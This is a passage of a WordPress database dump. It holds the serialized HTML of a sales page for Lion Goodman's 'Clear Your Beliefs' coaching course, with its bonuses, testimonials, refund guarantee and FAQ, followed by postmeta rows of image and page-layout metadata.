class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<div id="package">\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1472, 1941, '_edit_lock', '1520568781:2'),
(1494, 1953, '_edit_lock', '1418263982:2'),
(1486, 1951, '_wp_attached_file', '2014/12/Screenshot_4.png'),
(1487, 1951, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:160;s:6:"height";i:148;s:4:"file";s:24:"2014/12/Screenshot_4.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"Screenshot_4-150x148.png";s:5:"width";i:150;s:6:"height";i:148;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1488, 1951, '_edit_lock', '1418263221:2'),
(1489, 1952, '_wp_attached_file', '2014/12/Screenshot_3.png'),
(1490, 1952, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:160;s:6:"height";i:160;s:4:"file";s:24:"2014/12/Screenshot_3.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"Screenshot_3-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1491, 1952, '_edit_lock', '1418263521:2'),
(1492, 1953, '_wp_attached_file', '2014/12/Screenshot_2.png'),
(1493, 1953, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:160;s:6:"height";i:150;s:4:"file";s:24:"2014/12/Screenshot_2.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"Screenshot_2-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1481, 1941, '_wr_page_builder_content', '[wr_row width="boxed" background="none" solid_color_value="#FFFFFF" solid_color_color="#ffffff" gradient_color="0% #FFFFFF,100% #000000"  gradient_direction="vertical"  repeat="full"  img_repeat="full"  autoplay="yes" position="center center" paralax="no" border_width_value_="0" border_style="solid" border_color="#000"  div_padding_top="10" div_padding_bottom="10" div_padding_right="10" div_padding_left="10"   ][wr_column span="span3"][wr_image image_file="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4.png" image_size="thumbnail" link_type="no_link" image_container_style="no-styling" image_alignment="inherit" appearing_animation="0" disabled_el="no" ][/wr_image][/wr_column][wr_column span="span9"][/wr_column][/wr_row]'),
(1482, 1941, '_wr_html_content', '<div class=''jsn-bootstrap3''><div id=''yGUN1O'' class=''row ''  style=''padding-top:10px;padding-bottom:10px;padding-left:10px;padding-right:10px;''><div class="col-md-3 col-sm-3 col-xs-12" ><div   class=''jsn-bootstrap3 wr-element-container wr-element-image'' ><img width='''' height='''' src=''http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4-150x150.png'' /></div>\n</div><div class="col-md-9 col-sm-9 col-xs-12" ></div>\n</div></div>'),
(1483, 1941, '_wr_page_active_tab', '1'),
(1484, 1941, '_wr_deactivate_pb', '1'),
(1485, 1950, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:3:{s:3:"src";s:79:"http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4-150x150.png";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}}s:5:"grids";a:1:{i:0;a:1:{s:5:"cells";s:1:"2";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"0";}}}'),
(1501, 1958, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:1:{i:0;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:1:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}}}'),
(1495, 1954, 'panels_data', 'a:3:{s:7:"widgets";a:6:{i:0;a:3:{s:3:"src";s:71:"http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4.png";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:29:"Delete Block & Limitations...";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:27:"Allow More Success & Joy...";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:3:{s:3:"src";s:71:"http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_3.png";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:4;a:3:{s:3:"src";s:71:"http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_2.png";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:26:"Simply CLEAR Your Beliefs!";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:3:{i:0;a:1:{s:5:"cells";s:1:"2";}i:1;a:1:{s:5:"cells";s:1:"2";}i:2;a:1:{s:5:"cells";s:1:"2";}}s:10:"grid_cells";a:6:{i:0;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"0";}i:2;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"2";}}}'),
(1500, 1957, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:118:"<div class="top-img"> <img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:1:{i:0;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:1:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}}}'),
(1498, 1956, 'panels_data', 'a:3:{s:7:"widgets";a:6:{i:0;a:3:{s:3:"src";s:71:"http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4.png";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:55:"<h1 class="top-text">Delete Block & Limitations...</h1>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:53:"<h1 class="top-text">Allow More Success & Joy...</h1>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:3:{s:3:"src";s:71:"http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_3.png";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:4;a:3:{s:3:"src";s:71:"http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_2.png";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:52:"<h1 class="top-text">Simply CLEAR Your Beliefs!</h1>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:3:{i:0;a:1:{s:5:"cells";s:1:"2";}i:1;a:1:{s:5:"cells";s:1:"2";}i:2;a:1:{s:5:"cells";s:1:"2";}}s:10:"grid_cells";a:6:{i:0;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"0";}i:2;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"2";}}}'),
